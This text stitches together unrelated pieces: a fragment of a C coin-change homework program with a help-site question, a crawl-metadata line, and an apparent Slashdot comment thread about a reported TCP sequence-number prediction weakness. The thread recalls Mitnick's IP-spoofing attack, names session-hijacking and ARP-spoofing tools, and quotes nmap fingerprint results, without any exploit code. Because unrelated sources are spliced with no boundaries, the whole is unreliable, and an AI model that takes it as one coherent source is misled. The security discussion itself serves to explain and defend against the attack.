- (*dimes * 0.10) - (*nickels * 0.05)) / 0.01 + .005; //calculates the amount of pennies, and stores it into pennies void print(float total, int quarters, int dimes, int nickels, int pennies) printf("\nTOTAL VALUE ENTERED: $%.2f", total); printf("\n%3d quarters\n", quarters); printf("\n%3d dimes\n", dimes); printf("\n%3d nickels\n", nickels); printf("\n%3d pennies\n", pennies); I have some code that mostly works. The only thing is that it doesn't work for values below 0.32 What am I doing wrong? You never answered my question. You didn't send me the link to download it until now. Yes, I had to turn in my assignment without it though.
https://www.justanswer.com/computer-programming/7r18f-new-programming-assignment-problem.html
CC-MAIN-2017-39
refinedweb
448
66.54
String Array - Java Beginners String Array Thanks for the help you had provided,,, Your solution did worked... I worked on the previous solution given by you and it worked.... I... again,,, and I'll come back to you , if I had other problem regarding JAVA String in Java - Java Beginners ]); } } } ---------------------------------------------------- I am sending simple code of String array. If you are beginner in java... : Thanks...String in Java hiiiii i initialise a String array,str[] with a size Array sorting - Java Beginners " array also gets sorted automatically depending on the "name" array. Any help...Array sorting Hello All. I need to sort one array based on the arrangement of another array. I fetch two arrays from somewhere ARRAY - Java Beginners ARRAY How To Find Out Unique Elements Of Given Array... Plz Help Me? Hi Friend, Try the following code: import java.util.*; public class ArrayElements { public static void main(String[] args sorting an array of string with duplicate values - Java Beginners sorting an array of string Example to sort array string Array - Java Beginners Array Please help me to answer this problem..........Write a program using one-dimensional array that accept five input values from the keyboard... ArrayExample { public static void main(String[] args) throws IOException array example - Java Beginners array example hi!!!!! can you help me with this question..., with String properties for first and last names, and property called... dependents to Employee that is an array of Dependent objects, and instantiate a five array - Java Beginners array how to make a java program that will use an array to determine the number of male and female user??plz help me..:( Hi Friend, We have used Array List to determine the number of males and females. Here sorting an array of string with duplicate values - Java Beginners sorting an array of string with duplicate values I have a sort method which sorts an array of strings. But if there are duplicates in the array it would not sort properly ARRAY SIZE!!! - Java Beginners ARRAY SIZE!!! Hi, My Question is to: "Read integers from the keyboard until zero is read, storing them in input order in an array A. Then copy them to another array B doubling each integer.Then print B." Which seems Need help - Java Beginners Need help To Write a Java program that asks the users to enter a m..., respectively. The program stores this matrix into a two dimensional m*n array... array as its argument, performs its transpose, and returns the transposed n * m examples of merge-sorting integers but i can not understand how to this with String sorting an array of string with duplicate values - Java Beginners string with duplicate values How to check the string with duplicate values java array question. - Java Beginners java array question. I need help with this: Create a program... in an array. Have the program then print the numbers in rows of 10 and calculate... counter=0; String st=""; int sum=0; int[] ranNum = new int[50 HELP WITH ARRAY HELP WITH ARRAY Hi i would like this program: public class ArrayApp { public static void main(String[]args) { int [] arr; arr= new int... that the user input didn't match match with the number in the array boxes Help With an Array Help With an Array So what Im trying to do is write an array... trying to do is almost combine the two to create a larger array declaration... not figure out how to finish the code. Please HELP! A) students? names Array in Java - Java Beginners Array in Java Please help me with the following question. Thank you. Write a program that reads numbers from the keyboard into an array of type int[]. You may assume that there will be 50 or fewer entries in the array. Your array sort - Java Beginners ; } } public static void main(String a[]){ int i; int array...array sort hi all, can anybody tell me how to sort an array... array[], int len){ for (int i = 1; i < len; i++){ int j = i Java Array - Java Beginners Java Array Can someone help me to convert this to java? I have an array called Projects{"School", "House", "Bar"} I want all the possible combinations but only once each pair, for example ["House", "Bar"] is the SAME Help With an Array Help With an Array // ******************** // Sales.java // // Reads.... // // ******************** import java.util.Scanner; public class Sales { public static void main(String... need help from this part on. I need that part corrected and add a portion Java Array - Java Beginners Java Array Q1-Write a program to exchange non diagonal elements of two dimensinal NXN Array without using temporary array Hi Friend... SwapDiagonalArray{ public static void main(String[] args){ int TwoDarray java help - Java Beginners java help Code a catch block that catches a NumberFormatException...(String[] args) { String[] ar={"Roseindia", "Hello World", "1234"}; String str=""; int num; for(int count=0;count"+e); // -> added to identify Sorting String arrays in java - Java Beginners InterfaceStringArray { private String[] arr; //ref to array arr private int... String[size]; nElems = 0; //create array } public int getSize() { return...Sorting String arrays in java I have to make an interface java help - Java Beginners java help Code a catch block that catches a NumberFormatException... NumberFormatExceptionExample { public static void main(String[] args) { String[] ar={"Roseindia", "Hello World", "1234"}; String str=""; int num; for(int java help - Java Beginners java help Code a try statement that catches... NumberFormatExceptionExample1 { public static void main(String[] args) { try { String countString="Hello"; int count = Integer.parseInt java help - Java Beginners java help Code a statement to test a catch block that catches an IOException. Hi friend, Code a statement to test a catch block... void main(String[] args) { try { InputStreamReader java help - Java Beginners java help Code a try statement that calls the calculateDiscount... java.io.*; public class CalDiscount { public static void main(String[] args... information on Exception Handling in Java visit to : array - Java Beginners array how to determine both the diagonals of a 2-d array? How...*; public class FindDiagonals{ public static void main(String args[])throws... the size of 2D array :"); int i=input.nextInt(); int d[][]=new int[i][i java help - Java Beginners java help Write the code for a method named getFile that accepts a file name and returns a file created from the RandomAccessFile class. This method... the FileNotFoundException class Test{ public static void main(String args java help - Java Beginners java help Code a catch block that catches an IOException, prints the message ?An I/O exception occurred.? to the console, and then throws...{ public static void main(String[] args) { try { File f; f=new File ARRAY SIZE. - Java Beginners ARRAY SIZE. Thanks, well that i know that we can use ArrayList... the elements in array A. Then doubled array A by multiplying it by 2 and then storing it in array B. But gives me error. import java.io.*; import arrays help - Java Beginners includes readIntegers() that o reads the user inputs o stores them in an array, and o returns the array ? The program includes easySort() that o sorts values in the array in the ascending order, and returns the sorted array MultiDimensional Array - Java Beginners void main(String[] args) { int[][] array = new int[11][11]; for (int i...MultiDimensional Array Hello Sir, How i can display Multiplication Table of 1 to 10 by Using Multidimensional Array in java Hi Friend java help - Java Beginners java help Write the code for a method named calculateTax... { public static void main(String[] args) throws Exception { double salesTax...(e.getMessage()); } return sales_tax; } } For more information on Java java help - Java Beginners java help Code a try statement that parses a string variable named quantityString to an int variable and then calls the calculateDiscount method...(String[] args) throws IOException { double calculateDiscount java help - Java Beginners java help I would like to modify the client program so... console=new Scanner(System.in); public static void main(String[]args) { int x...(String args[]) { System.out.println("Result is : "+divide array 1 - Java Beginners array 1 WAP to input values in 2 arrays and merge them to array M...; for (int[] array : arr) { arrSize += array.length; } int[] result = new int[arrSize]; int j = 0; for (int[] array : arr Java help - Java Beginners Java help Was this code created by netbeans or any other tool?? I am... = stmt.executeQuery("select * from item where Item_Code='"+co+"'"); String name...(ActionEvent e){ String st=l5.getText(); double pr=Double.parseDouble(st array manipulation - Java Beginners array manipulation Given 2 int arrays, a and b, each length 3, return a new array length 2 containing their middle elements. middleWay({1, 2, 3... void main(String[] args) { ArrayMerge am = new ArrayMerge(); int a[] = {1 query String - Java Beginners how i implemmented and write code and send send me, I using query string or any thing else..please help me help with program - Java Beginners Help with program Simple Java Program // Defining class Stars.java to print stars in certain orderclass Stars{// main() functionpublic static void main(String[] args){int a = 1, b = 5, c, d, i; // declaring 5 int type please help me in a java program !! - Java Beginners please help me in a java program !! the porgram should use... { st = new int[SIZE]; // make array top = -1... class Graph class DFSApp { public static void main(String[] args SubString help - Java Beginners SubString help Hi , I would appreciate if somebody could help me... class FileReadExample { public static void main(String args[]) throws IOException...(System.in)); System.out.println("Please enter file name"); String str help me - Java Beginners help me i want to create a login form in java with jdbc connection...){ String value1=text1.getText(); String value2=text2.getText(); Connection con = null; String url = "jdbc:mysql://localhost:3306/"; String db help - Java Beginners to enter a decimal number. 2. Read a Java String. 3. Output the BCD for what... will help you. Please visit : The programming task You are to write a Java application help please - Java Beginners help please i wrote this program but the function newLine dosnt... java.io.IOException; public class DataToBinary{ public static void main(String... static void main(String[] args) throws IOException{ System.out.println("Data help me - Java Beginners help me helo guys can you share me a code about Currency Conversion.Money will convert according to the type of currency.would you help me please... into 2 decimal places sample 1.25) Mexican_________ guys help me..thank array - Java Beginners array i just want to ask how to create a program that will show who have the lowest and have the highest grade.. i appreciate a lot if you will reply.. thank you you will help me a lot... much love.. edison need help - Java Beginners need help Need help in programming in Java Simple java... the following code is this: public class print1{ public static void main(String...;class Stars{public static void main(String[] args){int a = 1, b = 5, c, d, i;while plz help - Java Beginners (String[] args) throws IOException{ System.out.println("Inserting Data to ur... java.io.*; class ArrayInput{ public static void main(String args[]) throws IOException { String tmp = "Abc"; byte b[] = tmp.getBytes(); int program help - Java Beginners (String[]args) { int radius,len,wid,choice; Vector myVector=new Vector...); }} public class Figure { private String type; public Figure() { type=""; } public Figure(String n) { type=n; } } public class Circle extends need help. - Java Beginners ;public class ConvetUppercase{ public static void main(String[] args) { Scanner... in lowercase!"); String str = scan.next(); str.substring(0, 97); String str1 Java Array Values to Global Varibles - Java Beginners Java Array Values to Global Varibles I am working on a program... to pass on to the rate and periods variables in the class declarations. Any help... } } public static void main(String args[]) throws IOException i need a quick response about array and string... i need a quick response about array and string... how can i make a dictionary type using array code in java where i will type the word then the meaning will appear..please help me..urgent array - Java Beginners " + maxCount); } public static void main(String [] args){ Scanner input=new array, index, string array, index, string how can i make dictionary using array...please help java help? java help? Write a program, where you first ask values to an array... (send in the array & return the counted value to the main program). Print.../arr.length; return avg; } public static void main(String[] args Array /string based problem.... Array /string based problem.... thanx to help me.but again a problem...("Enter string: "); String[] array = new String[5]; for(int i=0;i<5;i...]+" "); } } static String[] selectionSort(String[] array) { for (int i = 1 string array based problem string array based problem R/sir, firstly thanks to help me so much. but now it can sort string very well but in case of integers... string: "); String[] array = new String[5]; for(int i=0;i<5;i++){ array[i string ) " and "public static void main (String args[])" in java but it executes both... "String args[]" can mean a "string array called args which is an array" and the "String[] args" which basically says it?s a "string array called args". Either way array problem java - Java Beginners array problem java PLS HELP ME NOW I NEED YOU RESPONSE IMMDEATLETLY...]; int num; Write Java statements that do the following: a. Call the method..., respectively. another problem.,, 2.)Suppose list is an array of five string string program for String reverse and replace in c,c++,java e.g.Input:10,20,hello output:hello;20;10 Hi Friend, Try the following java...(String[] args) { String array[]=new String[5]; Scanner input Regular Expression Help Help HELP!!!! Regular Expression Help Help HELP!!!! HI all I am very new to java, but i have this problem i got a string e.g Courses['07001'].Title... did that by using this expression String regex = "Courses\[\'[^\']+\'\]\.Title Array in Java Array in Java public class tn { public class State{ String s_name; int p1; int p2; } public void f... } public static void main(String[] args) throws Exception { tn help i need help with this code. write a java code for a method named addSevenToKthElement that takes an integer array, and an integer k as its arguments and returns the kth element plus 7. any help would be greatly Java Dynamic Array - Java Beginners Java Dynamic Array Hi everyone, I have two String arrays, lets say: static String[] locations={"Greece", "Germany", "Italy"}; static String[] projects={"University", "School", "Hospital"}; I want to print with a loop Java Array declaration Java Array declaration In this section you will learn how to declare array in java. As we know an array is collection of single type or similar data type. When an array is created its length is determined. An array can hold fixed Help me please!!! - Java Beginners Help me please!!! im badly needing the complete code for this project in java!!! can you please help me???!!! it is about 1-dimensional array in java! it goes something like this. . . "GRADES" Student 1: Student 2 java -netbeans help - Java Beginners java -netbeans help a simple program in netbeans ide to add two...*; import java.awt.event.*; class input{ public static void main(String[] args...(new ActionListener(){ public void actionPerformed(ActionEvent e){ String OOP with Java-Array - Java Beginners OOP with Java-Array Write a program to assign passengers seats...*; public class AirlineReservation { public static void main(String args[]) throws Exception { String[][] seats = new String[7][4 Java programming help - Java Beginners Java programming help Write a program that asks the user...(String[] param) throws IOException{ InputStreamReader m = new InputStreamReader... static void raster(int a, int b, int c){ String result = ""; for(int Rows=1 Pass the array please.. - Java Beginners Pass the array please.. hi! i'm having problem... them in an array. When finished receiving the numbers, the program should pass the array to a method called averageNumbers. This method should average the numbers java program help - Java Beginners java program help sir i just want to clarify one statement that i am... incometax which we have to make a program on java a company has employees who... static void main(String args[]) throws IOException{ BufferedReader bf = new array split string array split string array split string class StringSplitExample { public static void main(String[] args) { String st = "Hello...]); } } } Split String Example in Java static void Main(string[] args java,java,java,help java,java,java,help Dear people, can anyone help me complete this program import java.util.*; public class StringDemo { static String a="{a=100;b...;(str.length); for (String[] array : str){ map.put(array[0], array[1 String Array Java String Array  ... how to make use of string array. In the java programming tutorial string, which are widly used in java program for a sequence of character. String Netbeans Array help of rolls possible within the array Help plese! Hi Friend, Try...Netbeans Array help Ok here is my code- * * To change this template... the command line arguments */ public static void main(String[] args) { Random please help me - Java Beginners please help me I have some error in this programe //write acomputer programe using java to generate following series : //output: //1,2,3,0,-2,7,-4..... class Series1HW { public static void main(String args String array sort String array sort Hi here is my code. If i run this code I am... language="java"%> <%@ page session="true"%> <% Connection... result_set=null; String route_number[]=new String[1000]; String Need *Help fixing this - Java Beginners Need *Help fixing this I need to make this program prompt user... and maybe add retrieve function //need help with this one badly. Thanks guys for all the help. import java.text.*; import javax.swing.*; import java.awt.event. ; private String Name; private double Salary; public Person(){ } public Person(int CivilNumber,String Name,double Salary){ this.CivilNumber... CivilNumber){ this.CivilNumber=CivilNumber; } public String getName this in java then try this: import java.util.*; class SquareNumber { public static void main(String[] args) { Scanner input=new Scanner(System.in Create a int array with the help of int buffer. Create a int array with the help of int buffer. In this tutorial, we will see how to create a int array with the help of int buffer. IntBuffer API...[] array() The array() method returns int array based on int buffer
http://www.roseindia.net/tutorialhelp/comment/85744
CC-MAIN-2014-10
refinedweb
3,075
56.76
Here’s how your test.hs might look like: import Test.Framework import Test.Framework.Providers.LeanCheck as LC import Data.List main :: IO () main = defaultMain tests tests :: [Test] tests = [ LC.testProperty "sort . sort == sort" $ \xs -> sort (sort xs :: [Int]) == sort xs , LC.testProperty "sort == id" -- not really, should fail $ \xs -> sort (xs :: [Int]) == xs ] And here is the output for the above program: $ ./eg/test sort . sort == sort: [OK, passed 100 tests.] sort == id: [Failed] *** Failed! Falsifiable (after 7 tests): [1,0] Properties Total Passed 1 1 Failed 1 1 Total 2 2 Options Use -a or --maximum-generated-tests to configure the maximum number of tests for each property. $ ./eg/test -a5 sort . sort == sort: [OK, passed 5 tests.] sort == id: [OK, passed 5 tests.] Properties Total Passed 2 2 Failed 0 0 Total 2 2 Since LeanCheck is enumerative, you may want to increate the default number of tests (100). Arbitrary rule of thumb: - between 200 to 500 on a developer machine; - between 1000 and 5000 on the CI. Your mileage may vary. Further reading - test-framework-leancheck’s Haddock documentation; - LeanCheck’s Haddock documentation; - test-framework’s Haddock documentation; - LeanCheck’s README; - test-framework’s official example; - Tutorial on property-based testing with LeanCheck.
https://www.stackage.org/nightly-2019-01-07/package/test-framework-leancheck-0.0.1
CC-MAIN-2019-04
refinedweb
208
68.97
On 10/01/13 20:44, Simon Marlow wrote: > On 10/01/13 19:24, Ian Lynagh wrote: >> Repository : ssh://darcs.haskell.org//srv/darcs/ghc >> >> On branch : master >> >> >> >> >>> --------------------------------------------------------------- >> >>? Never mind - I see that we still have the .o dependency, the .hs/.lhs dependency was just added. Still, I think an addition to the comments in the file to describe the reasoning would be a good idea (right now the comments don't match the code). Incidentally, the sanity check (hi-rule-helper) increases the time to do a no-op make from 3.3s to 4.9s here. I'm not sure it's worth having on by default, even on non-Windows, because of the impact on interactive development, and if the .hi file doesn't exist, something will go badly wrong very soon anyway. Cheers, Simon > Cheers, > Simon > > >>> --------------------------------------------------------------- >> >> ghc.mk | 4 ---- >> rules/hi-rule.mk | 8 +++++--- >> rules/hs-suffix-rules-srcdir.mk | 2 ++ >> rules/hs-suffix-rules.mk | 3 +++ >> 4 files changed, 10 insertions(+), 7 deletions(-) >> >> diff --git a/ghc.mk b/ghc.mk >> index f4a7a61..d71d8c9 100644 >> --- a/ghc.mk >> +++ b/ghc.mk >> @@ -229,10 +229,6 @@ ifneq "$(CLEANING)" "YES" >> include rules/hs-suffix-rules-srcdir.mk >> include rules/hs-suffix-rules.mk >> include rules/hi-rule.mk >> - >> -$(foreach way,$(ALL_WAYS),\ >> - $(eval $(call hi-rule,$(way)))) >> - >> include rules/c-suffix-rules.mk >> include rules/cmm-suffix-rules.mk >> >> diff --git a/rules/hi-rule.mk b/rules/hi-rule.mk >> index 35baffd..c1e7502 100644 >> --- a/rules/hi-rule.mk >> +++ b/rules/hi-rule.mk >> @@ -62,11 +62,13 @@ >> # documentation). An empty command is enough to get GNU make to think >> # it has updated %.hi, but without actually spawning a shell to do so. >> >> -define hi-rule # $1 = way >> +define hi-rule # $1 = source directory, $2 = object directory, $3 = way >> >> -%.$$($1_hisuf) : %.$$($1_osuf) ; >> +$2/%.$$($3_hisuf) : $2/%.$$($3_osuf) $1/%.hs ; >> +$2/%.$$($3_hisuf) : $2/%.$$($3_osuf) $1/%.lhs ; >> >> -%.$$($1_way_)hi-boot : %.$$($1_way_)o-boot ; >> +$2/%.$$($3_way_)hi-boot : $2/%.$$($3_way_)o-boot $1/%.hs ; >> +$2/%.$$($3_way_)hi-boot : $2/%.$$($3_way_)o-boot $1/%.lhs ; >> >> endef >> >> diff --git a/rules/hs-suffix-rules-srcdir.mk >> b/rules/hs-suffix-rules-srcdir.mk >> index 94a41d5..776d1ce 100644 >> --- a/rules/hs-suffix-rules-srcdir.mk >> +++ b/rules/hs-suffix-rules-srcdir.mk >> @@ -52,6 +52,8 @@ $1/$2/build/%.$$($3_hcsuf) : $1/$4/%.hs >> $$(LAX_DEPS_FOLLOW) $$($1_$2_HC_DEP) $$( >> $1/$2/build/%.$$($3_hcsuf) : $1/$4/%.lhs $$(LAX_DEPS_FOLLOW) >> $$($1_$2_HC_DEP) $$($1_$2_PKGDATA_DEP) >> $$(call cmd,$1_$2_HC) $$($1_$2_$3_ALL_HC_OPTS) -C $$< -o $$@ >> >> +$(call hi-rule,$1/$4,$1/$2/build,$3) >> + >> endif >> >> # XXX: for some reason these get used in preference to the direct >> diff --git a/rules/hs-suffix-rules.mk b/rules/hs-suffix-rules.mk >> index 9d54753..9b11e6e 100644 >> --- a/rules/hs-suffix-rules.mk >> +++ b/rules/hs-suffix-rules.mk >> @@ -28,6 +28,9 @@ $1/$2/build/%.$$($3_hcsuf) : >> $1/$2/build/autogen/%.hs $$(LAX_DEPS_FOLLOW) $$($1_ >> $1/$2/build/%.$$($3_osuf) : $1/$2/build/autogen/%.hs >> $$(LAX_DEPS_FOLLOW) $$($1_$2_HC_DEP) >> $$(call cmd,$1_$2_HC) $$($1_$2_$3_ALL_HC_OPTS) -c $$< -o $$@ >> >> +$(call hi-rule,$1/$2/build,$1/$2/build,$3) >> +$(call hi-rule,$1/$2/build/autogen,$1/$2/build,$3) >> + >> endif >> endif >> >> >> >> >> _______________________________________________ >> ghc-commits mailing list >> ghc-commits at haskell.org >> >> >
http://www.haskell.org/pipermail/ghc-devs/2013-January/000004.html
CC-MAIN-2014-41
refinedweb
534
63.66
Security Hole In TCP 184 Ant wrote to us with the report from eWeek concerning Guardent's find of a "potentially huge problem" in TCP. It's very similar to the hole found in some of the Cisco IOS software, concerning the ISN and the assignment of the number. Not as serious... (Score:2) This will only fully hijack unencrypted transmissions, and only if the hacker can predict the ISN sequence. It's made easier if the seed isn't random, but it's a long way from being a major threat, and it's not an unknown threat--many TCP/IP stack implementations are not vulnerable. So...? (Score:1) (Looks like it worked.) Re:Random Numbers (Score:1) I had a look at the site but couldn't see if this was taken into account, unless an allowance is made for this the spread of numbers will change over time. Admittedly this is theoretical and it should be random enough in the short term, but I'm not sure it's random in the long term. ---- Re:"Old as the Hills" (Score:1) see CERT advisories [neohapsis.com] dating back to 1995... as well as bugraq discussions [neohapsis.com] about it... This is a very well known "vulnerability". The most famous use of this vulnerability was by Kevin Mitnick to attack Tsutomu Shimomura's computers. Basically one of Shimomura's unix boxes had root level Tools like nmap [insecure.org] test for ISN randomness. Just about all unixen are atleast pseudo-random, which makes the attack almost impossible to do to two computers that you can't sniff traffic to or from. If you can sniff traffic from either box then the problem of hijacking connections becomes much simpler. At this point it doesn't even matter what the ISNs are because you can just sniff them. Tools like: hunt [fsid.cvut.cz] are the preferred tools for session hijacking. hunt even has ARP spoofing so that you can sniff over switched enviornments. Re:Oh no, not this religious war! (Score:1) Not that Theoretical - Mitnick did just this (Score:3) It was a case of IP spoofing against Shimomura. While he couldn't see results (IP spoof after all) the ability to guess ISN's allowed him to play the role of one of the computers involved in the transaction. Not my original source, but it does make mention of the story [robertgraham.com] Gaurdent rocks! (Score:2) Re:Not that Theoretical - Mitnick did just this (Score:3) Interesting read... in 1995... Basically one of Shimomura's unix boxes had root level Re:"Old as the Hills" (Score:2) Re:Randomness does not exist. (Score:1) Wrong. Quantum events are inherently random and not predictable. All you have to do is to amplify such events into strings of 0 and 1. One example is radioactive emissions -- if you can keep the source and detector in the range where you count one particle at a time. That's rather difficult to do in a way that's both safe and will keep running without adjustments. Another possibility: resistor shot noise, which originates in the fluctuations as individual electrons pass through the resistor. I am not good enough at analog design to figure out just how to use that, but it should be possible to generate random numbers from shot noise in a small circuit with common parts. If you are generating pseudo-random numbers entirely from software, then it is predictable, if you can guess the formula used. The simple formulas you'll find in pre-packaged "random number generator" subroutines are probably easily guessed. Go to a cryptographer and you can get formulas that are alterable by plugging in a secret key of hundreds of bits, so even if the basic formula is publicly known, guessing the key takes enormous computer power... Re:Looks like a pretty standard case to me. (Score:1) Inital Sequence Number guessing is only useful for spoofing "new" connections or blind spoofing. Thus the "Inital" part of the term. Basically you are blind spoofing communication between A and B (while your are C), to take advantage of some trust relationship between A and B. As pointed out in many posts this attack was done by Kevin Mitnick. Basically one of Shimomura's unix boxes had root level Session Hijacking is what you are reffering to. This is taking over an already established connection. In this attack you use the fact that you can sniff or obtain the sequence numbers already in existance by an extablished TCP connection and inject spoofed packets to interupt or tack of that session. Tools suchs as hunt [fsid.cvut.cz] do this type of attack. DMHO site (Score:1) Bruce It's not meaningless, just very old... (Score:3) But that doesn't mean it's not threatening. On the contrary, it's important to point out that TCP connection resilience is critical to the Internet infrastructure. TCP connections carry the BGP4 inter-ISP peering traffic that routes the backbone. By and large, there's not a whole lot of meaningful things you can do with TCP spoofing (even RSTs) on a clueful network. But there are infrastructure protocols that rely on TCP and major havoc to be caused if they're disrupted. There's been an unofficial understanding that router TCP stacks are not very robust. If ingress filtering isn't set up correctly, you can use flaws like this to disrupt peering sessions between routers. This is terrible. But Guardent could stand to be less hand-wavy and more forthcoming about their analyses. I think Bruce Perens could stand to be a little less glib, and pay a little closer attention. This appears to be valid research, blown out of context by PR. It happens, it sucks, but we shouldn't add to the problem by using the bad PR to obscure the threat. This isn't news at all. (Score:1) So, where's the story? Re:big-ass ad without version (Score:1), of course! why did you give them the press they wanted?!? (Score:1) In other news.. (Score:1) This is why any reasonable TCP stack uses good random number generators (like our friends This story is nigh-on useless. Ignore it. Re:NITROGEN WARNING is similar to TCP/IP warning (Score:1) -David T. C. This is out of proportion (Score:4) a) very hard to do, and b) rather limited in practical damage-causing. This issue is more founded in a company trying to make a name for itself by announcing a "huge" security flaw but it also appeals to the public at large to imagine that there might be some terrible hole underpinning the electronic revolution (like as in Y2K or the fuss around some dot.coms going belly up). Besides, this isn't a hole so much as a feature that can be used in a negative way. I don't think the possibility of doing this went unobserved by the hundreds of people involved in developing TCP. Geoff Re:Randomness does not exist. (Score:1) Random Numbers (Score:3) It is kind of like trying to prove something can't be done. ------------ CitizenC Re:automation K1DD33z (Score:1) Umm, when was the last time you saw a scr1pt k1dd13 tool posted to 2600. DeCSS, arguably (and I would argue not, but whatever). 2600 is more of a political/news site, not a script kiddie outpost. ------ Re:Randomness does not exist. (Score:1) Re:Random Numbers (Score:1) Re:Randomness does not exist. (Score:1) Re:NITROGEN WARNING is similar to TCP/IP warning (Score:2) Christ why are people modding this as funny! It should be +5 Insightful! Spread the word! Re:Automatic hijacking tools... (Score:1) Sloppy thinking. All traffic is data, though some is transmitted in larger bursts than other. A TCP connection carrying Telnet data (not a "terminal session") is the textbook example of traffic that should be buffered using Nagle's algorithm to avoid sending one packet per octet. The user's keystrokes will determine how far the outgoing sequence number is eventually incremented (unless the client does Telnet negotiation or sends urgent data), but guessing how many octets the server will respond with is another problem (as is preventing the client from resetting the connection once you've injected more than one window of data). Re:guessing a tcp sequence isnt *THAT* hard... (Score:1) Windows 2000 Workstation: TCP Sequence Prediction: Class=random positive increments Difficulty=232626 (Good luck!) Windows 2000 Server: TCP Sequence Prediction: Class=random positive increments Difficulty=22436 (Worthy challenge) Didn't have a Windows 9x box handy to try it out on but maybe this is what you have done. I assume this must change after every nmap, but why would the workstation be seemingly more secure than the server machine? I guess that's just Microsoft's way of doing things... The other curious thing I stumbled upon is the fact that the Windows 2000 Workstation was not recognized by this scan, it returned that no OS matched the host. Maybe this explains why it is so high, maybe it isn't Win2K after all, mind you I seem to be using the machine at the moment. Hmmmm...... Your street has a security hole! (Score:2) So lock the door, dummy. I'm no expert on TCP, but I think that anyone who cares about security at all already knows that it's not secure, it was not designed to be secure, and it never will be secure by itself. If you need security, you pile it on top of TCP/IP, by encrypting packets, etc. "Old as the Hills" (Score:2) So, is this really a big deal? (btw - fp.) Re:Random Numbers (Score:1) Re:Random Numbers (Score:1) -- Re:Random Numbers (Score:1) This guy [fourmilab.ch] is already doing that for free -- Re:Random Numbers (Score:1) That depends entirely on how you define a "random" number. If you want to be a big philosopher and claim that nothing is "random", be my guest (BTW, Quatum Mechanics guarantees that there is real, true randomness in the world - presuming it's possible to sample that). I (and most people working on crypto in academia [which I am not one of, but just pointing out there are plenty of informed people who think this]) adopt the more practial view that if there does not exist a polynomial time algorithm to decide if a given string is truly random or the output of the random number generator, it's "random". There are plenty of things that will do this just fine. It is kind of like trying to prove something can't be done. Huh? There are tons of things you can prove cannot be done. For example, I can prove that you cannot possibly find a integer n such that 2*n+1 is evenly divisible by two. Could you please explain what you meant by this? In fact, there are things such that you can provide proofs for both of the following: 1) It is not possible to prove that X exists. 2) It is not possible to prove that X does not exist. An example is an existence of a set S such that |N|<|S|<|R| (where N is the natural numbers and R is the real numbers). Re:Random Numbers (Score:1) All computer based random number generators are psuedo-random, which is considered to be "good enough", especially when you can get a seed from some semi-random source, such as the computers clock But getting back to the story, these poorly implemented TCP stacks are not evenly remotely close to being random. --- This is news, how? (Score:1) "This is extremely difficult to do. It's a theoretical attack," said security expert Steve Gibson, of Gibson Research Corp. in Laguna Hills, Calif. "It's weird that they're talking about something like this. It's as old as the hills." And that's from the article, itself... At least Guardent (or what ever it is..) suckered ZDNet into giving them some space in the news hole... t_t_b -- I think not; therefore I ain't® Re:RFC1948 (Score:4) Finally, the problem was fixed for real at the OS level in almost every OS in late 1998 or so. Unpredictably random ISNs and increments are quite common. The popular tool "nmap" can even scan a machine and tell you how unpredicatable its sequence numbers are. Non-microsoft OSes (and win2000) generate sequence numbers quite securely. This is very old, non-news. The best quote in the whole article is the security expert who points out that this has been known pretty much forever, was fixed 5 years ago, and the fix was widely deployed over 3 years ago. Re:NITROGEN WARNING is similar to TCP/IP warning (Score:4) NITROGEN WARNING is similar to TCP/IP warning (Score:5) Of course, the air has contained that much Nitrogen for the entire existence of the human species. And this TCP security problem has existed nearly as long, and has had about as little effect on your life. People fix this by improving their random number generators. Big deal. Bruce Re:Looks like a pretty standard case to me. (Score:1) Really, Bonker, is it necessary to insult our fellow primates, the Chimpanzees, by comparing them (even favorably) to a group of attention-hounding, press-seducing, history-ignorant, technogonadless marketers? Re:"Old as the Hills" (Score:5) Re:Which other protocols *also* have holes? (Score:1) 2.1.53 would have been an unstable kernel anyway. SMB is bloated all on it's own, made worse by Microsoft. How could it not have huge, unknown bugs? ------ Re:Random Numbers (Score:2) There is a new issue. (Score:1) In other news (Score:2) Re:Which other protocols *also* have holes? (Score:4) I see *you've* never taken measure theory (Score:2) > I mean - technically nothing can ever be absolute (we can't be sure > 1+1==2; we've just observed it throughout all of recorded history) Oh yes, that's been proved. Take a graduate measure theory course, or maybe even an upper division undergraduate theory course. You start with the notion of a "something"--a scratch, a stick, a whatever, and build from there. On the other hand, proving that an observed phenomenon actually corresponds to the derived "1" or "2" is another matter, but you can certainly prove 1+1=2 from the ground up . . . hawk Re:Is this really a problem? (Score:1) You're talking about pseudorandom numbers there. Random numbers simply cannot be "generated". Although there are several secure pseudorandom number generators, but one shouldn't mix them with real randomness. (Take the unix C random() for example, it's initialized with 32 bits and thus it's entropy can never exceed that. Same goes for famous stream cipher RC4 (the internal state is 256bytes but still) and all others aswell. To create truly random numbers one needs an entropy source. Computerwise there are few handy ways to get real entropy into the pseudorandom number generators, here are few examples 1) They sell hw cards that have cold radioactive sources and detectors in them. Radioactive decay after all is as random as it gets. 2) Unplugged line-in jack has static which has several random bits in it. When undisturbed, it can be concidered random. 3) The already mentioned web cam pointed to a lava lamp. 4) On UNIX systems the process table can be concidered to have some randomness in it, but one shouldnt screw up with that one either. It has atmost 10-20 bits of randomness when also measured relatively seldom. 5) User key typing or mouse motion Re:This is NOT new nor is it news... (Score:1) Now we know that it is merely these 'packet IDs'. I'm sure many people have pointed out that guessing these is not really much of an attack, as spoofing packets is nothing new, and people use encryption for anything important -- and encrypted data is not vulnerable to this attack. Re:Uh... Isnt this an old hole? (Score:1) Again, IIRC, OpenBSD's stack uses some of the best random numbers (as shown by nmap when it tries to predict the OS of the target.) Other than that, thanks :) I was curious as to why OpenBSD was rated so much lower. (although it's all relative) Background research for slashdot? What a strange idea. :) Re:guessing a tcp sequence isnt *THAT* hard... (Score:2) You know... if you're gonna mask out the ip, better mask out the host name as well cause DNS doesnt lie! (Well, usually it doesn't) Re:Uh... Isnt this an old hole? (Score:2) #nmap -O hostname OpenBSD 2.8: TCP Sequence Prediction: Class=random positive increments Difficulty=28836 (Worthy challenge) Remote operating system guess: OpenBSD 2.6 Digital (Tru64) UNIX 4.0F: TCP Sequence Prediction: Class=random positive increments Difficulty=355 (Medium) Remote OS guesses: Digital UNIX OSF1 V 4.0,4.0B,4.0D,4.0E, Digital UNIX OSF1 V 4.0-4.0F Linux 2.2.18: TCP Sequence Prediction: Class=random positive increments Difficulty=3738947 (Good luck!) Remote OS guesses: Linux 2.1.122 - 2.2.14, Linux kernel 2.2.13 I don't have much else to test, but it seems to me that the Linux TCP/IP stack uses significantly better random numbers than OpenBSD, as shown by nmap. I'd wager some others do 